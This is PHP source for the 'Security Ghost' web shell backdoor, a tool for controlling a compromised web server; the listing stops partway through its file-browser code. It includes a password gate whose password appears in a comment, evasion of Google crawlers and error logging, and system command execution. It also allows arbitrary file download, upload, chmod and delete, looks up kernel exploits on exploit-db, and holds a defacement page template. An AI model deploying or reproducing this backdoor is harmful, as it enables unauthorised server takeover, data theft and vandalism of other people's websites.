test

1. <?php
2. @ini_set('output_buffering',0); //
3. //@ini_set('display_errors', 0); //
4. //@ini_set('error_reporting', 0); //
5. /*
6. #####################################################
7. ## Name : Secghost Shell Backdoor ##
8. ## Version : v1.5 Mini ##
9. ## Author : Rizasyah Zero5 ##
10. ## Contact : rizasyah79@gmail.com ##
11. ## Report : secghost14@gmail.com ##
12. ## (c) 2017 www.security-ghost.club ##
13. #####################################################
14. */
15. $pass = "19d027d62ef406fb2cd6190b12c4d770"; // Password Encrypted By MD5, pass is:" Zero5 "
16. $title = "Security Ghost Shell Backdoor"; // Title
17. $color = "aqua"; // Color
18. $background= "https://dncache-mauganscorp.netdna-ssl.com/cropped-wallpapers/1236/1236914-1366x768-[DesktopNexus.com].jpg?st=ibJVW4RB2I3lR_A8JwHNzg&e=1491982925"; // Background
19. $logo = "https://scontent-sin6-1.xx.fbcdn.net/v/t34.0-12/17806824_120300003038695641_1380040679_n.png?oh=6534f0dbcaf67592c83ff4a697561c39&oe=590F0791"; // Logo
20. $music = ""; // Music, isi url music elu :v *cuman bisa didengerin di "about" :v , malas gw taroh di depan, soalnya kalok ada yg nggak suka :v
21. $script_deface = "<html><head><title>Hacked By Security Ghost</title></head><body>Hacked by Security Ghost <br> Crew's :all member Security Ghost|<embed src='http://www.youtube.com/v/FM7MFYoylVs&autoplay=1&loop=1' type='application/x-shockwave-flash' wmode='transparent' width='0' height='0'></embed>"; //Script Deface. (html, php, txt)
22.  
23. /*
24. Content is encrypted by gzdeflate , base64 , and others . if you want the source code , please use the tool "PHP Decrypter". In case you dont trust me :-P
25. */
26.  
27. $xName = "Security Ghost";
28. $versi = "v1.5 Mini"; // Shell Version
29. $default_action = 'FilesMan';
30. @define('SELF_PATH', __FILE__);
31. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
32. header('HTTP/1.0 404 Not Found');
33. exit; }
34. @session_start();
35. @error_reporting(0);
36. @ini_set('error_log',NULL);
37. @ini_set('log_errors',0);
38. @ini_set('max_execution_time',0);
39. @ini_set('output_buffering',0);
40. @ini_set('display_errors', 0);
41. @set_time_limit(0);
42. @set_magic_quotes_runtime(0);
43. @define('VERSION', '2.1');
44. if( get_magic_quotes_gpc() ) {
45. function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
46. $_POST = stripslashes_array($_POST);
47. }
48. function printLogin() {
49. ?><html><head>
50. <link rel="SHORTCUT ICON" href="http://oi58.tinypic.com/10r33mq.jpg">
51. <title>Security Ghost</title>
52. </head>
53. <body>
54. <style type="text/css">
55. body { background-color:transparan;background:#000;background-image: url("https://dncache-mauganscorp.netdna-ssl.com/cropped-wallpapers/1236/1236914-1366x768-[DesktopNexus.com].jpg?st=ibJVW4RB2I3lR_A8JwHNzg&e=1491982925");background-position: center; background-attachment: fixed;background-repeat: repeat; }
56. .tabnez{ margin:30px auto 0 auto;border: 1px solid #333333; color: grey;
57. -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;}
58. body,td,th {font-family: Verdana;font-size: 12px;color: grey;font-weight: bold;}
59. input {BORDER-RIGHT:grey 1px solid;BORDER-TOP:grey 1px solid;BORDER-LEFT:grey 1px solid;BORDER-BOTTOM: grey 1px solid;BACKGROUND-COLOR: #111111;COLOR: grey;font: 8pt Verdana;}
60. </style><style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1048.cur), progress !important;}</style>
61.  
62. <img src="https://scontent-sin6-1.xx.fbcdn.net/v/t34.0-12/17806824_120300003038695641_1380040679_n.png?oh=6534f0dbcaf67592c83ff4a697561c39&oe=590F0791" title="Security Ghost" style="float:left" alt="Exploded" height='250' width='700'/>
63. <br><br><br><br><br><br><br><br><br><center>
64. <table>
65. <form method='post'>
66. <tr>
67. <td><img src='http://oi58.tinypic.com/10r33mq.jpg' class="tabnez" height='20' width='24'></td>
68. <td><input class="tabnez" type="password" name="pass" placeholder="Password"></td>
69. <td><input class="tabnez" type="submit" value="Login !"></td>
70. </tr>
71. </form>
72. </table>
73. </body>
74. </html>
75. <?php break ;
76. exit;
77. }
78. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
79. if( empty( $pass ) ||
80. ( isset( $_POST['pass']) && ( md5($_POST['pass']) == $pass ) ) )
81. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
82. else
83. printLogin();
84.  
85. @ini_set('log_errors',0);
86. @ini_set('display_errors',0);
87. @ini_set('output_buffering',0);
88. @ini_set('file_uploads',1);
89. if(isset($_GET['dl']) && ($_GET['dl'] != "")){
90. $file = $_GET['dl'];
91. $filez = @file_get_contents($file);
92. header("Content-type: application/octet-stream");
93. header("Content-length: ".strlen($filez));
94. header("Content-disposition: attachment; filename=\"".basename($file)."\";");
95. echo $filez;
96. exit;
97. }
98. elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
99. $file = $_GET['dlgzip'];
100. $filez = gzencode(@file_get_contents($file));
101. header("Content-Type:application/x-gzip\n");
102. header("Content-length: ".strlen($filez));
103. header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
104. echo $filez;
105. exit;
106. }
107. // view image
108. if(isset($_GET['img'])){
109. @ob_clean();
110. $d = magicboom($_GET['y']);
111. $f = $_GET['img'];
112. $inf = @getimagesize($d.$f);
113. $ext = explode($f,".");
114. $ext = $ext[count($ext)-1];
115. @header("Content-type: ".$inf["mime"]);
116. @header("Cache-control: public");
117. @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
118. @header("Cache-control: max-age=".(60*60*24*7));
119. @readfile($d.$f);
120. exit;
121. }
122. //php info
123. $phpinfo = "?&amp;x=phpinfo";
124. // Server software
125.  
126. $software = getenv("SERVER_SOFTWARE");
127. // CMD
128. $cmdbox = "help";
129. // Server Port
130. $serverport = $_SERVER["SERVER_PORT"];
131. // Backdoor Name
132. $backdoor_name = "$title ";
133. // check safemode
134. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
135. // uname -a
136. $system = @php_uname();
137. // detector
138. function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
139. function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
140. function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
141. function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
142. function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }}
143. function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }}
144. function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
145. function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}}
146. function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}}
147. function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}}
148. function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}}
149. // check os
150. if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
151. else $win = FALSE;
152. // change directory
153. if(isset($_GET['y'])){
154. if(@is_dir($_GET['view'])){
155. $pwd = $_GET['view'];
156. @chdir($pwd);
157. }
158. else{
159. $pwd = $_GET['y'];
160. @chdir($pwd);
161. }
162. }
163. //hdd
164. function convertByte($s) {
165. if($s<=0) return 0;
166. $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
167. $e = floor(log($s)/log(1024));
168. return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
169. }
170. //
171.  
172. // username, id, shell prompt and working directory
173. if(!$win){
174. if(!$user = rapih(exe("whoami"))) $user = "";
175. if(!$id = rapih(exe("id"))) $id = "";
176. $prompt = $user." \$ ";
177. $pwd = @getcwd().DIRECTORY_SEPARATOR;
178. }
179. else {
180. $user = @get_current_user();
181. $id = $user;
182. $prompt = $user." &gt;";
183. $pwd = realpath(".")."\\";
184. // find drive letters
185. $v = explode("\\",$d);
186. $v = $v[0];
187. foreach (range("A","Z") as $letter)
188. {
189. $bool = @is_dir($letter.":\\");
190. if ($bool)
191. {
192. $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
193. if ($letter.":" != $v) {$letters .= $letter;}
194. else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
195. $letters .= " </a>] ";
196. }
197. }
198. }
199.  
200. function getrealip(){
201. if (!empty($_SERVER['HTTP_CLIENT_IP']))
202. { $ip=$_SERVER['HTTP_CLIENT_IP'];
203. }elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR']))
204. //TO CHEK IP IS PASS FROM PROXY
205. { $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
206. }else { $ip=$_SERVER['REMOTE_ADDR'];
207. }
208. return $ip;
209. }
210.  
211. function showdisablefunctions() {
212. if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#ff0000'><b>".$disablefunc."</b></span>"; }
213. else { return "<span style='color:#00FF00'><b>NONE</b></span>"; }
214. }
215.  
216. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
217. else $posix = FALSE;
218. // server ip
219. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
220. // your ip ;-)
221. $my_ip = $_SERVER['REMOTE_ADDR'];
222. $admin_id=$_SERVER['SERVER_ADMIN'];
223. $bindport = "13123";
224. $bindport_pass = "exploded";
225. // Security Ghost
226. $uplink = "http://www.security-exploded.org/search/label/Exploded Shell Backdoor";
227. //wilworm
228. $release = @php_uname('r');
229. $kernel = @php_uname('s');
230. $millink='http://milw0rm.com/search.php?dong=';
231.  
232. if( strpos('Linux', $kernel) !== false )
233. $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
234. else
235. $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
236. if(!function_exists('posix_getegid')) {
237. $user = @get_current_user();
238. $uid = @getmyuid();
239. $gid = @getmygid();
240. $group = "?";
241. } else {
242. $uid = @posix_getpwuid(@posix_geteuid());
243. $gid = @posix_getgrgid(@posix_getegid());
244. $user = $uid['name'];
245. $uid = $uid['uid'];
246. $group = $gid['name'];
247. $gid = $gid['gid'];
248. }
249. // Exploit-db
250. $release = @php_uname('r');
251. $kernel = @php_uname('s');
252. $explink = 'http://exploit-db.com/search/?action=search&filter_description=';
253.  
254. if( strpos('Linux', $kernel) !== false )
255. $explink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
256. else
257. $explink .= urlencode( $kernel . ' ' . substr($release,0,3) );
258. if(!function_exists('posix_getegid')) {
259. $user = @get_current_user();
260. $uid = @getmyuid();
261. $gid = @getmygid();
262. $group = "?";
263. } else {
264. $uid = @posix_getpwuid(@posix_geteuid());
265. $gid = @posix_getgrgid(@posix_getegid());
266. $user = $uid['name'];
267. $uid = $uid['uid'];
268. $group = $gid['name'];
269. $gid = $gid['gid'];
270. }
271. // separate the working direcotory
272. $pwds = explode(DIRECTORY_SEPARATOR,$pwd);
273. $pwdurl = "";
274. for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
275. $pathz = "";
276. for($j = 0 ; $j <= $i ; $j++){
277. $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
278. }
279. $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
280. }
281.  
282. // Rename file or folder
283. if(isset($_POST['Rename'])){
284. $old = $_POST['oldname'];
285. $new = $_POST['newname'];
286. @Rename($pwd.$old,$pwd.$new);
287. $file = $pwd.$new;
288. }
289. if(isset($_POST['uploadcompt'])){
290. if(is_uploaded_file($_FILES['file']['tmp_name'])){
291. $path = magicboom($_POST['path']);
292. $fname = $_FILES['file']['name'];
293. $tmp_name = $_FILES['file']['tmp_name'];
294. $pindah = $path.$fname;
295. $stat = @move_uploaded_file($tmp_name,$pindah);}
296. }
297.  
298. if( $_POST['_upl'] == "Upload" ) {
299. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
300. else { echo ''; }
301. }
302. if(isset($_POST['Chmod'])){
303. $name = $_POST['name'];
304. $value = $_POST['newvalue'];
305. if (strlen($value)==3){
306. $value = 0 . "" . $value;}
307. @Chmod($pwd.$name,octdec($value));
308. $file = $pwd.$name;}
309. if(isset($_POST['Chmod_folder'])){
310. $name = $_POST['name'];
311. $value = $_POST['newvalue'];
312. if (strlen($value)==3){
313. $value = 0 . "" . $value;}
314. @Chmod($pwd.$name,octdec($value));
315. $file = $pwd.$name;}
316.  
317. //////////////////////////////////
318. // print useful info
319.  
320. $buff = "Shell Backdoor : <b><font style='color:$color'> $backdoor_name $versi</font><b> <span class=\"gaya\"></a></b></b></font><b><span class=\"gaya\"> | </span><a href='$uplink' title='Search Shell Backdoor From Security Ghost' target='_blank'><font style='color:#ff0000'>[ Security Ghost ]</a></b></font><br>Version : <b><font style='color:$color'>".$versi."</font></a></b><br> Software : <b>".$software."</b><br />";
321. $buff .= "System OS : <b>".$system." | <a href='http://www.google.com/search?q=".urlencode(@php_uname())."' title='Search System OS From Google' target='_blank'><font style='color:#ff0000'>[ Google ]</font></a> | <a href='".$millink."' title='Search Karnel From Milw0rm' target=_blank><font style='color:#ff0000'>[ Milw0rm ]</font></a> | <a href='".$explink."' title='Search Karnel From Exploit-db' target=_blank><font style='color:#ff0000'>[ Exploit-db ]</font></a></b><br />";
322. if($id != "") $buff .= "ID : <b>".$id."</b><br />";
323. $buff .= "PHP Version : <b>".phpversion()."</b> ON <b>".php_sapi_name()."<span class=\"gaya\"> | </span><a href='$phpinfo' title='PHP Info'><font style='color:#ff0000'>[ PHP Info ]</font></a> </b><br />";
324. $buff .= "Server IP : <b><font style='color:#ff0000'>".$server_ip."</font></b> <span class=\"gaya\"> | </span> Port Server : <b><font style='color:#ff0000'>".$serverport."</font></b><span class=\"gaya\"> | </span> Your IP Surving : <b><a href='http://www.dnsstuff.com/tools?runFromMain=".getrealip()."&toolType=traceroute' title='Traceroute Your IP' target='_blank'><font style='color:#ff0000'>".getrealip()."<font></a></b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
325. $buff .= "Free Disk: <font style='color:#ff0000'><b>".convertByte(disk_free_space("/"))." <span class=\"gaya\"> / </span> ".convertByte(disk_total_space("/"))."</b></font></span><br />";
326. if($safemode) $buff .= "Safemode: <span class=\"gaya\"><font style='color:#ff0000'><b>ON</b></font></span><br />";
327. else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
328. $buff .= "Disable Functions: ".showdisablefunctions()."<br />";
329. $buff .= "MySQL: ".testmysql()."&nbsp;&nbsp;|&nbsp;&nbsp;MSSQL: ".testmssql()."&nbsp;&nbsp;|&nbsp;&nbsp;Oracle: ".testoracle()."&nbsp;&nbsp;|&nbsp;&nbsp;Perl: ".testperl()."&nbsp;&nbsp;|&nbsp;&nbsp;Python: ".testpython()."&nbsp;&nbsp;|&nbsp;&nbsp;Ruby: ".testruby()."&nbsp;&nbsp;|&nbsp;&nbsp;Java: ".testjava()."&nbsp;&nbsp;|&nbsp;&nbsp;GCC: ".testgcc()."&nbsp;&nbsp;|&nbsp;&nbsp;cURL: ".testcurl()."&nbsp;&nbsp;|&nbsp;&nbsp;WGet: ".testwget()."<br>";
330. $buff .="<font color=00ff00 >Drive : <b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
331.  
332.  
333. function rapih($text){
334. return trim(str_replace("<br />","",$text));
335. }
336.  
337. function magicboom($text){
338. if (!get_magic_quotes_gpc()) {
339. return $text;
340. }
341. return stripslashes($text);
342. }
343.  
344. function showdir($pwd,$prompt){
345. $fname = array();
346. $dname = array();
347. if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
348. else $posix = FALSE;
349. $user = "????:????";
350. if($dh = @scandir($pwd)){
351. foreach($dh as $file){
352. if(is_dir($file)){
353. $dname[] = $file;
354. }
355. elseif(is_file($file)){
356. $fname[] = $file;
357. }
358. }
359. }
360. else{
361. if($dh = @opendir($pwd)){
362. while($file = @readdir($dh)){
363. if(@is_dir($file)){
364. $dname[] = $file;
365. }
366. elseif(@is_file($file)){
367. $fname[] = $file;
368. }
369. }
370. @closedir($dh);
371. }
372. }
373. sort($fname);
374. sort($dname);
375. $path = @explode(DIRECTORY_SEPARATOR,$pwd);
376. $tree = @sizeof($path);
377. $parent = "";
378. $buff = "<center>
379. <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
380. <table class=\"cmdbox\" style=\"width:45%;\">
381. <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=help /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
382. </form>
383. <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
384. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
385. <tr><td><b>View </b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr></center>
386.  
387. </form></table><br><table class=\"explore\">
388. <tr><th>Name</th><th style=\"width:80px;\">Size</th><th style=\"width:210px;\">Owner:Group</th><th style=\"width:80px;\">Perms</th><th style=\"width:110px;\">Modified</th><th style=\"width:190px;\">Actions</th></tr>
389. ";
390. if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
391. else $parent = $pwd;
392.  
393. foreach($dname as $folder){
394. if($folder == ".") {
395. if(!$win && $posix){
396. $name=@posix_getpwuid(@fileowner($folder));
397. $group=@posix_getgrgid(@filegroup($folder));
398. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
399. }
400. else {
401. $owner = $user;
402. }
403. $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>-</td>
404. <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
405. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
406. <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">New Folder</a> | <a href=\"javascript:tukar('titik1','titik4_form');\">Upload</a></span>
407. <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
408. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
409. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
410. <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
411. </form>
412. <form action=\"\" id=\"titik4_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
413. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
414. <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
415. <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
416. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
417. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
418. </form></td>
419.  
420. </tr>
421. ";
422. }
423. elseif($folder == "..") {
424. if(!$win && $posix){
425. $name=@posix_getpwuid(@fileowner($folder));
426. $group=@posix_getgrgid(@filegroup($folder));
427. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
428. }
429. else {
430. $owner = $user;
431. }
432. $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'></a></td><td>-</td>
433. <td style=\"text-align:center;\">".$owner."</td>
434. <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
435. <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">New File</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">New Folder</a> | <a href=\"javascript:tukar('titik2','titik3_form');\">Upload</a></span>
436. <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
437. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
438. <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
439. <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" style=\"width:35px;\" value=\"Go !\" />
440. </form>
441. <form action=\"\" id=\"titik3_form\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
442. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
443. <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
444. <input class=\"inputzbut\" name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"/>
445. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
446. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" />
447. </form>
448. </td></tr>";
449. }
450. else {
451. if(!$win && $posix){
452. $name=@posix_getpwuid(@fileowner($folder));
453. $group=@posix_getgrgid(@filegroup($folder));
454. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
455. }
456. else {
457. $owner = $user;
458. }
459. $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' /> [ $folder ]</b></a>
460. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
461. <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
462. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
463. <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
464. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
465. </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
466. <td><center>
467. <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
468. <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
469. <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
470. <input class=\"inputz\" style=\"width:150px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
471. <input class=\"inputzbut\" type=\"submit\" name=\"Chmod_folder\" value=\"Chmod\" />
472. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
473. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
474. <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
475. <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">Rename</a> | <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\">Upload</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">Delete</a></span>
476. <form action=\"\" id=\"".clearspace($folder)."_form4\" method=\"post\" enctype=\"multipart/form-data\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
477. <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
478. <input class=\"inputz\" type=\"file\" name=\"file\" size=\"20\"/><br>
479. <input class=\"inputz\" name=\"path\" type=\"text\" size=\"33\" value=\"".$pwd.$folder.DIRECTORY_SEPARATOR."\" /><br>
480. <input class=\"inputzbut\" name=\"uploadcompt\" type=\"submit\" value=\"Upload\"/>
481. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\"
482. onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form4');\" />
483. </form>
484. </td></tr>";
485. }
486. }
487.  
488. foreach($fname as $file){
489. $full = $pwd.$file;
490. if(!$win && $posix){
491. $name=@posix_getpwuid(@fileowner($folder));
492. $group=@posix_getgrgid(@filegroup($folder));
493. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
494. }
495. else {
496. $owner = $user;
497. }
498. $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' /> $file</b></a>
